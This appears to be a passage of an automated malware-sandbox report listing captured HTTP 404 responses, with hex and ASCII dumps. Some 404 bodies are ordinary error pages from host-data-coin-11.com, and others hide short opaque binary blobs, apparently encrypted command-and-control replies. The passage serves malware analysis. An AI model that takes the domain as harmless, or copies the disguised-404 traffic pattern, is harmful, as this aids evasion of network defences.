                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:15 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:15 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:17 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 48I:82OOjQmFqdV@dfkK50
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.14.0 (Ubuntu)
                              Date: Fri, 14 Jan 2022 11:27:59 GMT
                              Content-Type: text/html
                              Content-Length: 178
                              Connection: keep-alive
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:22 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:25 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:26 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:26 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 2bI:82OI<\FF2K90
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:29 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
